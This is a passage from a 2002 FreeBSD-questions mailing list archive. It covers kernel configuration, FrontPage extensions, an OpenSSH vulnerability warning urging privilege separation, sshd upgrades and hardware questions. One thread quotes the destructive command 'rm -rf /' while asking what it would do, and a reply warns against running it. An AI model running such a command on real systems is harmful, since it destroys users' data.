device ncv # NCR 53C500 device nsp # Workbit Ninja SCSI-3 device stg # TMC 18C30/18C50 # SCSI peripherals device scbus # SCSI bus (required) device da # Direct Access (disks) device sa # Sequential Access (tape etc) device cd # CD device pass # Passthrough device (direct SCSI access) # RAID controllers interfaced to the SCSI subsystem # device asr # DPT SmartRAID V, VI and Adaptec SCSI RAID # device dpt # DPT Smartcache - See LINT for options! # device mly # Mylex AcceleRAID/eXtremeRAID # RAID controllers # device aac # Adaptec FSA RAID, Dell PERC2/PERC3 # device ida # Compaq Smart RAID # device amr # AMI MegaRAID # device mlx # Mylex DAC960 family # device twe # 3ware Escalade # atkbdc0 controls both the keyboard and the PS/2 mouse device atkbdc0 at isa? port IO_KBD device atkbd0 at atkbdc? irq 1 flags 0x1 device psm0 at atkbdc? irq 12 device vga0 at isa? # splash screen/screen saver pseudo-device splash # syscons is the default console driver, resembling an SCO console device sc0 at isa? flags 0x100 # Enable this and PCVT_FREEBSD for pcvt vt220 compatible console driver #device vt0 at isa? #options XSERVER # support for X server on a vt console #options FAT_CURSOR # start with block cursor # If you have a ThinkPAD, uncomment this along with the rest of the PCVT lines #options PCVT_SCANSET=2 # IBM keyboards are non-std # Floating point support - do not disable. device npx0 at nexus? port IO_NPX irq 13 # Power management support (see LINT for more options) device apm0 at nexus? disable flags 0x20 # Advanced Power Management # PCCARD (PCMCIA) support # device card # device pcic0 at isa? irq 0 port 0x3e0 iomem 0xd0000 # device pcic1 at isa? irq 0 port 0x3e2 iomem 0xd4000 disable # Serial (COM) ports device sio0 at isa? port IO_COM1 flags 0x10 irq 4 device sio1 at isa? port IO_COM2 irq 3 # device sio2 at isa? disable port IO_COM3 irq 5 # device sio3 at isa? disable port IO_COM4 irq 9 # Parallel port device ppc0 at isa? irq 7 device ppbus # Parallel port bus (required) device lpt # Printer device plip # TCP/IP over parallel device ppi # Parallel port interface device #device vpo # Requires scbus and da # PCI Ethernet NICs. # device de # DEC/Intel DC21x4x (``Tulip'') # device txp # 3Com 3cR990 (``Typhoon'') # device vx # 3Com 3c590, 3c595 (``Vortex'') # PCI Ethernet NICs that use the common MII bus controller code. # NOTE: Be sure to keep the 'device miibus' line in order to use these NICs! device miibus # MII bus support # device dc # DEC/Intel 21143 and various workalikes device fxp # Intel EtherExpress PRO/100B (82557, 82558) # device pcn # AMD Am79C97x PCI 10/100 NICs # device rl # RealTek 8129/8139 # device sf # Adaptec AIC-6915 (``Starfire'') # device sis # Silicon Integrated Systems SiS 900/SiS 7016 # device ste # Sundance ST201 (D-Link DFE-550TX) device tl # Texas Instruments ThunderLAN device tx # SMC EtherPower II (83c170 ``EPIC'') # device vr # VIA Rhine, Rhine II # device wb # Winbond W89C840F # device wx # Intel Gigabit Ethernet Card (``Wiseman'') device xl # 3Com 3c90x (``Boomerang'', ``Cyclone'') # device bge # Broadcom BCM570x (``Tigon III'') # ISA Ethernet NICs. # 'device ed' requires 'device miibus' device ed0 at isa? port 0x280 irq 10 iomem 0xd8000 device ex device ep device fe0 at isa? port 0x300 # Xircom Ethernet # device xe # PRISM I IEEE 802.11b wireless NIC. device awi # WaveLAN/IEEE 802.11 wireless NICs. Note: the WaveLAN/IEEE really # exists only as a PCMCIA device, so there is no ISA attachment needed # and resources will always be dynamically assigned by the pccard code. device wi # Aironet 4500/4800 802.11 wireless NICs. Note: the declaration below will # work for PCMCIA and PCI cards, as well as ISA cards set to ISA PnP # mode (the factory default). If you set the switches on your ISA # card for a manually chosen I/O address and IRQ, you must specify # those parameters here. # device an # The probe order of these is presently determined by i386/isa/isa_compat.c. device ie0 at isa? port 0x300 irq 10 iomem 0xd0000 #device le0 at isa? port 0x300 irq 5 iomem 0xd0000 device lnc0 at isa? port 0x280 irq 10 drq 0 device cs0 at isa? port 0x300 device sn0 at isa? port 0x300 irq 10 # Pseudo devices - the number indicates how many units to allocate. pseudo-device loop # Network loopback pseudo-device ether # Ethernet support pseudo-device sl 1 # Kernel SLIP pseudo-device ppp 1 # Kernel PPP pseudo-device tun # Packet tunnel. pseudo-device pty # Pseudo-ttys (telnet etc) pseudo-device md # Memory "disks" # pseudo-device gif # IPv6 and IPv4 tunneling # pseudo-device faith 1 # IPv6-to-IPv4 relaying (translation) # The `bpf' pseudo-device enables the Berkeley Packet Filter. # Be aware of the administrative consequences of enabling this! pseudo-device bpf #Berkeley packet filter # USB support device uhci # UHCI PCI->USB interface device ohci # OHCI PCI->USB interface device usb # USB Bus (required) device ugen # Generic device uhid # "Human Interface Devices" device ukbd # Keyboard device ulpt # Printer # device umass # Disks/Mass storage - Requires scbus and da device ums # Mouse device uscanner # Scanners device urio # Diamond Rio MP3 Player # USB Ethernet, requires mii # device aue # ADMtek USB ethernet # device cue # CATC USB ethernet # device kue # Kawasaki LSI USB ethernet --0-2139314008-1024964603=:5180-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 18: 0:30 2002 Delivered-To: freebsd-questions@freebsd.org Received: from postoffice.aims.com.au (eth0.lnk.aims.com.au [203.31.73.253]) by hub.freebsd.org (Postfix) with ESMTP id 08A6937B403 for ; Mon, 24 Jun 2002 18:00:06 -0700 (PDT) Received: from postoffice.aims.com.au (nts-ts1.aims.private [192.168.10.2]) by postoffice.aims.com.au with ESMTP id g5P104m28643 for ; Tue, 25 Jun 2002 11:00:04 +1000 (EST) (envelope-from chris@aims.com.au) Received: from ntsts1 by aims.com.au with SMTP (MDaemon.v3.5.3.R) for ; Tue, 25 Jun 2002 10:59:52 +1000 Reply-To: From: "Chris Knight" To: Cc: "'FBSDQ'" , Subject: RE: Frontpage Server Extensions version 5 Date: Tue, 25 Jun 2002 10:59:51 +1000 Message-ID: <004301c21be3$9ceeb150$020aa8c0@aims.private> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal X-Return-Path: chris@aims.com.au X-MDaemon-Deliver-To: questions@FreeBSD.ORG Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Howdy, I got exactly the same error as Jeff when I upgraded a modified apache13-modssl with FrontPage extensions (Apache 1.3.17, mod_ssl 2.8.0, FrontPage 4.0.4.3) to the latest apache13-modssl. I then needed to add mod_frontpage and frontpage5 ports to get back my FrontPage extensions. What I posted below was a quick hack. I went back and found the cause of the problem. The problem is that the mod_frontpage port runs a perl script (Makefile.PL) getting a directory listing of the DocumentRoot directory. In my case, it was missing the uid of the directory. A patch to mod_frontpage can be found at http://www.freebsd.org/cgi/query-pr.cgi?pr=ports%2F39686 Hope this helps. Regards, Chris Knight Systems Administrator AIMS Independent Computer Professionals Tel: +61 3 6334 6664 Fax: +61 3 6331 7032 Mob: +61 419 528 795 Web: http://www.aims.com.au > -----Original Message----- > From: Joe & Fhe Barbish [mailto:barbish@a1poweruser.com] > Sent: Monday, 24 June 2002 22:41 > To: chris@aims.com.au > Cc: FBSDQ; jtollison@multipro.com > Subject: RE: Frontpage Server Extensions version 5 > > > Now I am no expert, but this is my understanding of how apache and > FrontPage get delivered by the ports system. > First of all there are two methods of installing apache & FP. > > The Apache13-fp port has apache 1.3.26 and FrontPage married together. > and this install works right out of the port, as I just installed it > last Friday to get the fix for the just announced security > hole in apache. > > The second method is to install 3 separate ports, apache13, > mod_frontpage, followed by frontpage-5. I have not been able to get > this one to work since the start of the year when mod_frontpage was > changed to use APXS. > > The original poster never stated which method he used, so the solution > posted may not be correct for his situation. > But maybe you were able to tell from the symptoms. > If this is the solution for the mod_frontpage method, then would you > please post a bug report with your solution so the mod_frontpage port > maintainer can fix the port for everyone. > > If I am incorrect in my understanding please point it out, as I am > always interested in learning more. > > -----Original Message----- > From: owner-freebsd-isp@FreeBSD.ORG > [mailto:owner-freebsd-isp@FreeBSD.ORG]On > Behalf Of Chris Knight > Sent: Sunday, June 23, 2002 2:04 AM > To: 'Jeff Tollison' > Cc: freebsd-isp@freebsd.org > Subject: RE: Frontpage Server Extensions version 5 > > Howdy, > > The minimum uid in mod_frontpage has been compiled with a > value of 100, and > not 80. > You're best off doing the following: > > cd /usr/ports/www/mod_frontpage > make clean > make configure > vi work/mod_frontpage_mirfak-1.6.2/fpexec.h > - change FP_UID_MIN from 100 to 80 > make FORCE_PKG_REGISTER=yes install > > FrontPage Extensions should then work correctly. > > Regards, > Chris Knight > Systems Administrator > AIMS Independent Computer Professionals > Tel: +61 3 6334 6664 Fax: +61 3 6331 7032 Mob: +61 419 528 795 > Web: http://www.aims.com.au > > > > > -----Original Message----- > > From: owner-freebsd-isp@FreeBSD.ORG > > [mailto:owner-freebsd-isp@FreeBSD.ORG]On Behalf Of Jeff Tollison > > Sent: Sunday, 23 June 2002 12:16 > > To: freebsd-isp@FreeBSD.ORG > > Subject: Frontpage Server Extensions version 5 > > > > > > > > I have been beating my head trying to get FP Server Extensions to > > work, I have installed a "root web" and "subwebs" and all I > > get when I try to edit the website with FP is: > > > > * The website loads into Frontpage with no password > > * web root owned by privileged user: > > /usr/local/www/data/_vti_bin/shtml.exe in the server log > > > > Does anyone have a clue what I might be doing overlooking? > > > > Thanks in advance for your help > > > > ---- > > Jeff Tollison > > The MultiPro Network > > jtollison@multipro.com > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-isp" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-isp" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 18: 5:57 2002 Delivered-To: freebsd-questions@freebsd.org Received: from jive.SoftHome.net (jive.SoftHome.net [66.54.152.27]) by hub.freebsd.org (Postfix) with SMTP id 5618137B406 for ; Mon, 24 Jun 2002 18:05:55 -0700 (PDT) Received: (qmail 10704 invoked by uid 417); 25 Jun 2002 01:05:50 -0000 Received: from shunt-smtp-out-0 (HELO softhome.net) (172.16.3.12) by shunt-smtp-out-0 with SMTP; 25 Jun 2002 01:05:50 -0000 Received: from unknown ([216.194.20.180]) (AUTH: LOGIN yid@softhome.net) by softhome.net with esmtp; Mon, 24 Jun 2002 19:05:48 -0600 Date: Mon, 24 Jun 2002 21:03:12 -0400 From: Joshua Lee To: questions@FreeBSD.org Subject: make.conf CPU setting reccomendation? Message-Id: <20020624210312.13f3e0f6.yid@softhome.net> Organization: Plan B Software Labs X-Mailer: Sylpheed version 0.7.5claws (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I'm running a Pentium 4, but noted in the docs that telling in /etc/make.conf for it to optimize according to more powerful architectures can break things. What is the highest, most optimal for my processor, setting considered safe? Are there particular packages that need less in the way of the CPU= setting than others? Thanks in advance. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 18:29:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from host3.visualpresence2000.com (host3.visualpresence2000.com [209.239.53.64]) by hub.freebsd.org (Postfix) with ESMTP id C225637B403 for ; Mon, 24 Jun 2002 18:29:12 -0700 (PDT) Received: from hewlettsqusv2q (66-81-76-101-modem.o1.com [66.81.76.101]) by host3.visualpresence2000.com (8.10.2/8.10.2) with SMTP id g5P1T5n25184 for ; Mon, 24 Jun 2002 21:29:05 -0400 Message-ID: <002601c21be7$af4eaf40$654c5142@hewlettsqusv2q> From: "Ken" To: Subject: RM question Date: Mon, 24 Jun 2002 18:28:54 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0023_01C21BAC.FEAFE3A0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0023_01C21BAC.FEAFE3A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi all, Without actually trying it. I know that as root 'rm -rf / ' would whack the whole filesystem. Just = out of curiosity, what would that do as a normal user? I kow they = couldn't hurt teh root filesystem, but would it recursively search teh = whole system and remove and directory and files that the user has write = permissions for ? That's my guess anyway. Ken ------=_NextPart_000_0023_01C21BAC.FEAFE3A0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi all,
 
Without actually trying = it.
I know that as root 'rm -rf / ' would = whack the=20 whole filesystem. Just out of curiosity, what would that do as a normal = user? I=20 kow they couldn't hurt teh root filesystem, but would it recursively = search teh=20 whole system and remove and directory and files that the user has write=20 permissions for ?
That's my guess anyway.
 
 
Ken
 
------=_NextPart_000_0023_01C21BAC.FEAFE3A0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 19: 4:42 2002 Delivered-To: freebsd-questions@freebsd.org Received: from marbles.lost.net.au (marbles.lost.net.au [203.87.95.130]) by hub.freebsd.org (Postfix) with ESMTP id 0C05F37B406 for ; Mon, 24 Jun 2002 19:04:35 -0700 (PDT) Received: from localhost (tim@localhost) by marbles.lost.net.au (8.11.6/8.11.3) with ESMTP id g5P24LK82426; Tue, 25 Jun 2002 11:34:21 +0930 (CST) (envelope-from tim@lost.net.au) Date: Tue, 25 Jun 2002 11:34:20 +0930 (CST) From: tim peters To: Ken Cc: questions@FreeBSD.ORG Subject: Re: RM question In-Reply-To: <002601c21be7$af4eaf40$654c5142@hewlettsqusv2q> Message-ID: <20020625113258.E80770-100000@marbles.lost.net.au> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, 24 Jun 2002, Ken wrote: K> Hi all, K> K> Without actually trying it. I know that as root 'rm -rf / ' K> would whack the whole filesystem. Just out of curiosity, what K> would that do as a normal user? I kow they couldn't hurt teh K> root filesystem, but would it recursively search teh whole K> system and remove and directory and files that the user has K> write permissions for ? That's my guess anyway. yes, it would. so don't do that, unless you really mean it :) -- tim@lost.net.au To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 19:24:22 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailhost.gu.edu.au (kraken.itc.gu.edu.au [132.234.250.31]) by hub.freebsd.org (Postfix) with ESMTP id 3AEC737B414 for ; Mon, 24 Jun 2002 19:24:13 -0700 (PDT) Received: from kurango.cit.gu.edu.au (daemon@kurango.cit.gu.edu.au [132.234.86.1]) by mailhost.gu.edu.au (8.10.1/8.10.1) with ESMTP id g5P2OCB14749; Tue, 25 Jun 2002 12:24:12 +1000 (EST) Received: from localhost (steve@localhost) by kurango.cit.gu.edu.au (8.12.2/8.12.2) with SMTP id g5P2O8GE001460; Tue, 25 Jun 2002 12:24:09 +1000 (EST) Date: Tue, 25 Jun 2002 12:24:08 +1000 (EST) From: Steven Goodwin To: Scott Reese Cc: freebsd-questions@FreeBSD.ORG Subject: Re: SWAT/SAMBA problems In-Reply-To: <1024955167.276.8.camel@borges.codysbooks.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 24 Jun 2002, Scott Reese wrote: > [note: I'm not currently subbed to this list so please 'Cc:' me > directly in any replies. Thank you.] > > After successfully building and installing Samba 3.0 alpha-17 on my > 4.6-RELEASE box, I have found that Swat does not work for some strange > reason. I uncommented the swat line in /etc/inetd.conf, checked to make > sure the service was listed in /etc/services (which it was) and then I > HUP'd inetd and I still cannot connect to Swat. I've tried using > 'http://localhost:901' as well as 'http://my.ip.address:901' and neither > worked. This condition persisted after a reboot as well. It shouldn't require any rebooting on FreeBSD's side of things although rebooting windows often works ;-) If your browser is using a http proxy, disable it (on your browser) and try again. Steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 20:47:57 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.radzinschi.com (pcp01838331pcs.owngsm01.md.comcast.net [68.32.62.39]) by hub.freebsd.org (Postfix) with ESMTP id D1F5F37B400 for ; Mon, 24 Jun 2002 20:47:32 -0700 (PDT) Received: from localhost (marco@localhost.radzinschi.com [127.0.0.1]) by mail.radzinschi.com (8.12.3/8.12.3) with ESMTP id g5P3lVIY022406 for ; Mon, 24 Jun 2002 23:47:31 -0400 (EDT) (envelope-from marco@radzinschi.com) Date: Mon, 24 Jun 2002 23:47:31 -0400 (EDT) From: Marco Radzinschi To: FreeBDS-Questions Subject: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020624234646.G22328-100000@mail.radzinschi.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I thought this might be of interest to some people on the list... ---------- Forwarded message ---------- Date: Mon, 24 Jun 2002 15:00:10 -0600 From: Theo de Raadt To: bugtraq@securityfocus.com Cc: dsi@iss.net, announce@openbsd.org, misc@openbsd.org Subject: Upcoming OpenSSH vulnerability There is an upcoming OpenSSH vulnerability that we're working on with ISS. Details will be published early next week. However, I can say that when OpenSSH's sshd(8) is running with priv seperation, the bug cannot be exploited. OpenSSH 3.3p was released a few days ago, with various improvements but in particular, it significantly improves the Linux and Solaris support for priv sep. However, it is not yet perfect. Compression is disabled on some systems, and the many varieties of PAM are causing major headaches. However, everyone should update to OpenSSH 3.3 immediately, and enable priv seperation in their ssh daemons, by setting this in your /etc/ssh/sshd_config file: UsePrivilegeSeparation yes Depending on what your system is, privsep may break some ssh functionality. However, with privsep turned on, you are immune from at least one remote hole. Understand? 3.3 does not contain a fix for this upcoming bug. If priv seperation does not work on your operating system, you need to work with your vendor so that we get patches to make it work on your system. Our developers are swamped enough without trying to support the myriad of PAM and other issues which exist in various systems. You must call on your vendors to help us. Basically, OpenSSH sshd(8) is something like 27000 lines of code. A lot of that runs as root. But when UsePrivilegeSeparation is enabled, the daemon splits into two parts. A part containing about 2500 lines of code remains as root, and the rest of the code is shoved into a chroot-jail without any privs. This makes the daemon less vulnerable to attack. We've been trying to warn vendors about 3.3 and the need for privsep, but they really have not heeded our call for assistance. They have basically ignored us. Some, like Alan Cox, even went further stating that privsep was not being worked on because "Nobody provided any info which proves the problem, and many people dont trust you theo" and suggested I "might be feeding everyone a trojan" (I think I'll publish that letter -- it is just so funny). HP's representative was downright rude, but that is OK because Compaq is retiring him. Except for Solar Designer, I think none of them has helped the OpenSSH portable developers make privsep work better on their systems. Apparently Solar Designer is the only person who understands the need for this stuff. So, if vendors would JUMP and get it working better, and send us patches IMMEDIATELY, we can perhaps make a 3.3.1p release on Friday which supports these systems better. So send patches by Thursday night please. Then on Tuesday or Wednesday the complete bug report with patches (and exploits soon after I am sure) will hit BUGTRAQ. Let me repeat: even if the bug exists in a privsep'd sshd, it is not exploitable. Clearly we cannot yet publish what the bug is, or provide anyone with the real patch, but we can try to get maximum deployement of privsep, and therefore make it hurt less when the problem is published. So please push your vendor to get us maximally working privsep patches as soon as possible! We've given most vendors since Friday last week until Thursday to get privsep working well for you so that when the announcement comes out next week their customers are immunized. That is nearly a full week (but they have already wasted a weekend and a Monday). Really I think this is the best we can hope to do (this thing will eventually leak, at which point the details will be published). Customers can judge their vendors by how they respond to this issue. OpenBSD and NetBSD users should also update to OpenSSH 3.3 right away. On OpenBSD privsep works flawlessly, and I have reports that is also true on NetBSD. All other systems appear to have minor or major weaknesses when this code is running. (securityfocus postmaster; please post this through immediately, since i have bcc'd over 30 other places..) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 20:51:27 2002 Delivered-To: freebsd-questions@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id 8652337B400 for ; Mon, 24 Jun 2002 20:51:20 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id 09E7124412; Mon, 24 Jun 2002 22:51:19 -0500 (CDT) Received: from tandist.nospam.schulte.org (void.schulte.org [209.134.156.217]) by clink.schulte.org (Postfix) with ESMTP id 28240243BE; Mon, 24 Jun 2002 22:51:17 -0500 (CDT) Message-Id: <5.1.1.6.2.20020624224948.02923518@pop3s.schulte.org> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Mon, 24 Jun 2002 22:51:23 -0500 To: Marco Radzinschi , FreeBDS-Questions From: Christopher Schulte Subject: Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: <20020624234646.G22328-100000@mail.radzinschi.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG At 11:47 PM 6/24/2002 -0400, Marco Radzinschi wrote: >I thought this might be of interest to some people on the list... > >---------- Forwarded message ---------- >Date: Mon, 24 Jun 2002 15:00:10 -0600 >From: Theo de Raadt >To: bugtraq@securityfocus.com >Cc: dsi@iss.net, announce@openbsd.org, misc@openbsd.org >Subject: Upcoming OpenSSH vulnerability > >There is an upcoming OpenSSH vulnerability that we're working on with >ISS. Details will be published early next week. [snip] Check over on -security, there is a very heated discussion happening right now. -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 21: 9:51 2002 Delivered-To: freebsd-questions@freebsd.org Received: from jester.ti.com (jester.ti.com [192.94.94.1]) by hub.freebsd.org (Postfix) with ESMTP id 3F9AA37B406 for ; Mon, 24 Jun 2002 21:09:42 -0700 (PDT) Received: from dlep8.itg.ti.com ([157.170.134.88]) by jester.ti.com (8.11.6/8.11.6) with ESMTP id g5P49gr15690 for ; Mon, 24 Jun 2002 23:09:42 -0500 (CDT) Received: from dlep8.itg.ti.com (localhost [127.0.0.1]) by dlep8.itg.ti.com (8.9.3/8.9.3) with ESMTP id XAA14256 for ; Mon, 24 Jun 2002 23:09:41 -0500 (CDT) Received: from popsvr.india.ti.com (popsvr.india.ti.com [157.87.95.215]) by dlep8.itg.ti.com (8.9.3/8.9.3) with ESMTP id XAA14197 for ; Mon, 24 Jun 2002 23:09:38 -0500 (CDT) Received: from gautham ([192.168.185.126]) by popsvr.india.ti.com (8.8.8/8.8.8) with SMTP id JAA03904 for ; Tue, 25 Jun 2002 09:39:34 +0530 (IST) Reply-To: From: "Gautham Ganapathy" To: "FreeBSD.org - Questions" Subject: RE: [OFF] Pentium vs Athlon which is better Date: Tue, 25 Jun 2002 09:40:21 +0530 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <20020624211811.A335@fishballoon.dyndns.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tuesday, June 25, 2002 1:48 AM, Scott Mitchell wrote: > > > > There's a small problem with AMD's, you need a very good > fan or cooling > > system. > > Well, you need a heatsink that's approved by AMD, which is > not really a > problem. Hopefully your server is going to be located > somewhere you don't > care about the noise it makes, so you can put some nice big > fans in the > case and everything will be fine. > > A lot of recent Athlon boards properly support the chip's > thermal diode, so > your system will at least shut down safely if your cooling does die. > > That said, my Athlon XP 1800+ box runs perfectly happily and almost > silently with a 'flower cooler' http://from www.quietpc.com/ > and a couple > of 1500RPM fans. IMHO this belief that Athlon systems always > need extreme > cooling is often overstated; it's probably the fault of all the > overclocking nuts trying to squeeze every last MHz out of their > machines... now you do need some serious cooling to pull that > kind of thing > off :-) I have an Athlon (tbird 850) running on an A7V333. AMD approved heatsink/fan. The CPU temp often goes to around 85C and the fan is genarally at around 6000rpm (smashed my finger on it once). is this normal ? motherboard temp is somewhere at 50C. the temp hike is generally when i am in freebsd or playing games in win2k. running normal apps (ie, editors, etc) is generally not a problem. is this a problem b/w the cpu and the mb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 23:10:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hotmail.com (dav12.pav3.hotmail.com [64.4.38.116]) by hub.freebsd.org (Postfix) with ESMTP id 0D8A737B481 for ; Mon, 24 Jun 2002 23:08:10 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 24 Jun 2002 23:08:09 -0700 X-Originating-IP: [203.129.223.38] Reply-To: "Akthar Hussain" From: "Akthar Hussain" To: Subject: Great FreeBSD Date: Tue, 25 Jun 2002 11:44:06 +0530 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-ID: X-OriginalArrivalTime: 25 Jun 2002 06:08:09.0836 (UTC) FILETIME=[AE403AC0:01C21C0E] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, Yesterday my NTFS (NT 4.0) server hard disk crashed .i am nable to read any data from that NT Drive.I connected NTFS drive in other 2 , 3 Windows system as slave but no yse Win200 and NT 4.0 won't recogniz the hard disk. But in Great freebsd i mounded successfull the crashed NTFS hard disk.Also i recoverd most of the data . But still i need to recover 2 more files from that failure hard disk .but i am unable to recover it from . If anybady knows good share ware recovery tools to recover my data from NTFS plsase let me know,. Thanks....... ah To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 23:13:38 2002 Delivered-To: freebsd-questions@freebsd.org Received: from nycsmtp1out.rdc-nyc.rr.com (nycsmtp1out.rdc-nyc.rr.com [24.29.99.226]) by hub.freebsd.org (Postfix) with ESMTP id A36A337B498 for ; Mon, 24 Jun 2002 23:08:15 -0700 (PDT) Received: from despammed.com (66-108-172-188.nyc.rr.com [66.108.172.188]) by nycsmtp1out.rdc-nyc.rr.com (8.12.1/Road Runner SMTP Server 1.0) with SMTP id g5P67fs3025872 for ; Tue, 25 Jun 2002 02:07:42 -0400 (EDT) Date: Tue, 25 Jun 2002 02:08:18 -0500 From: Scott Robbins To: Freebsd-questions@freebsd.org Subject: Upgrading ssh--anything wrong with this method Message-ID: <20020625070818.GA18001@scott1.homeunix.net> Mail-Followup-To: Freebsd-questions@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG After fumbling around on a couple of test boxes and messing up some start up scripts, I found this method for upgrading openssh seems to work. I'm just wondering if there is anything drastic that I'm missing. After doing make install-- mkdir /var/empty cp /usr/local/etc/ssh/sshd_config /etc/ ps ax | grep sshd kill cp /usr/local/sbin/sshd /usr/sbin/sshd sshd In other words, just putting the newer version where the old version was, and letting the default startup scripts start it. I imagine that there are better ways, but I don't know enough about Makefiles to edit it. TIA Scott Robbins To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 23:29:58 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by hub.freebsd.org (Postfix) with SMTP id 6FE9C37B408 for ; Mon, 24 Jun 2002 23:29:43 -0700 (PDT) Received: (qmail 32494 invoked by uid 0); 25 Jun 2002 06:29:41 -0000 Received: from unknown (HELO gmx.net) (217.110.34.96) by mail.gmx.net (mp002-rz3) with 